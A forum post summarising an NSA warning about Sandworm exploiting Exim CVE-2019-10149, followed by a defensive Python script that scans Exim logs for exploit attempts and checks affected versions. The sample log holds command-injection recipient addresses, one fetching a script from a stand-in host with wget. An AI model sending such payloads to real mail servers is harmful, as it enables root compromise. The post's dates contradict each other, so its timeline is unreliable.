NSA warns of new Sandworm attacks on email servers

[correlate]

Thread author
May 4, 2019
The U.S. National Security Agency (NSA) says that Russian military threat actors known as Sandworm Team have been exploiting a critical flaw in the Exim mail transfer agent (MTA) software since at least August 2019.

The vulnerability tracked as CVE-2019-10149 and named "The Return of the WIZard" makes it possible for unauthenticated remote attackers to execute arbitrary commands as root on vulnerable mail servers — for some non-default server configurations — after sending a specially crafted email.

"When the patch was released last year, Exim urged its users to update to the latest version," the agency says. "NSA adds its encouragement to immediately patch to mitigate against this still current threat."

Patching of Exim mail servers is not going fast enough, and members of the Russian hacker group Sandworm are actively exploiting three critical vulnerabilities that allow remote command or code execution.

Close to a million Exim servers are currently exposed and vulnerable, although the number is gradually getting lower every day. Exim 4.93 is currently considered a safe release.
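Two checks an administrator would want after reading this: whether the local Exim is in the range affected by CVE-2019-10149 (Exim 4.87 through 4.91, fixed in 4.92), and whether the mainlog already shows the `${run{...}}` expansion in a recipient address that the exploit relies on. The example below is added here and is not from the article, the NSA advisory, or the Exim project; the log lines are constructed to look like Exim's mainlog format, the `parse_exim_version()` helper expects the first line of `exim -bV` output, and the 4.93 threshold in `needs_update()` is the page's own "safe release" claim rather than a vulnerability boundary.

```python
import re
from typing import Iterable, List, NamedTuple, Optional, Tuple

# The Exim string-expansion operator that a crafted RCPT TO address abuses in
# CVE-2019-10149; a legitimate local part never contains it.
RUN_EXPANSION = "${run{"

# Address carrying the expansion, as it would appear in a mainlog line,
# e.g. ${run{/bin/sh -c "id"}}@localhost (greedy so the whole command is kept).
RUN_ADDR_RE = re.compile(r"\$\{run\{.*\}\}@[\w.\-]+")

# Sending host in Exim log syntax: H=(helo) [ip]
HOST_RE = re.compile(r"\[(?P<ip>[0-9a-fA-F.:]+)\]")


class Hit(NamedTuple):
    line_no: int
    ip: Optional[str]
    address: str


def scan_mainlog(lines: Iterable[str]) -> List[Hit]:
    """Return every line whose logged address contains the ${run{ expansion."""
    hits = []
    for n, line in enumerate(lines, 1):
        if RUN_EXPANSION not in line:
            continue
        addr = RUN_ADDR_RE.search(line)
        ip = HOST_RE.search(line)
        hits.append(Hit(n,
                        ip.group("ip") if ip else None,
                        addr.group(0) if addr else line.strip()))
    return hits


VERSION_RE = re.compile(r"Exim version (\d+)\.(\d+)(?:\.(\d+))?")


def parse_exim_version(bv_output: str) -> Tuple[int, int, int]:
    """Parse 'Exim version 4.91 #1 built ...' (first line of `exim -bV`)."""
    m = VERSION_RE.search(bv_output)
    if not m:
        raise ValueError("no Exim version string found")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def vulnerable_to_cve_2019_10149(version: Tuple[int, int, int]) -> bool:
    # Affected releases per the Exim advisory: 4.87 up to and including 4.91.
    return (4, 87, 0) <= version < (4, 92, 0)


def needs_update(version: Tuple[int, int, int],
                 safe: Tuple[int, int, int] = (4, 93, 0)) -> bool:
    # 4.93 is the release the post above calls safe; older 4.92.x builds had
    # further fixes after CVE-2019-10149, so treat anything below it as stale.
    return version < safe


# Constructed sample mainlog: one clean delivery, one rejected exploit attempt,
# one accepted message whose recipient carries the expansion, one local delivery.
LOG_SAMPLE = """\
2019-06-10 03:14:07 1hYv7r-0001Bf-2P <= alice@example.org H=(mail.example.org) [192.0.2.10] P=esmtp S=1220
2019-06-10 03:15:22 H=(localhost) [198.51.100.7] F=<> rejected RCPT <${run{/bin/sh -c "wget http://example.invalid/x.sh"}}@localhost>: relay not permitted
2019-06-10 03:15:23 1hYv96-0001C2-4Q <= <> H=(localhost) [198.51.100.7] P=esmtp S=351 for ${run{/bin/sh -c "id"}}@localhost
2019-06-10 03:16:01 1hYv9k-0001C9-7T => bob <bob@example.org> R=local_delivery T=local_delivery
"""

if __name__ == "__main__":
    for hit in scan_mainlog(LOG_SAMPLE.splitlines()):
        print(f"line {hit.line_no}: {hit.ip} -> {hit.address}")
    ver = parse_exim_version("Exim version 4.91 #1 built 12-Jun-2019 17:48:00")
    print("CVE-2019-10149 affected:", vulnerable_to_cve_2019_10149(ver))
    print("below 4.93:", needs_update(ver))
```

On a real host, feed `scan_mainlog()` the contents of `/var/log/exim4/mainlog` (or wherever your distribution writes it) and `parse_exim_version()` the output of `exim -bV`; a hit on a rejected RCPT line means the attempt was blocked by the ACL, while a hit on an accepted `<=` line on an unpatched version means the command most likely ran as root and the host should be treated as compromised, not just patched.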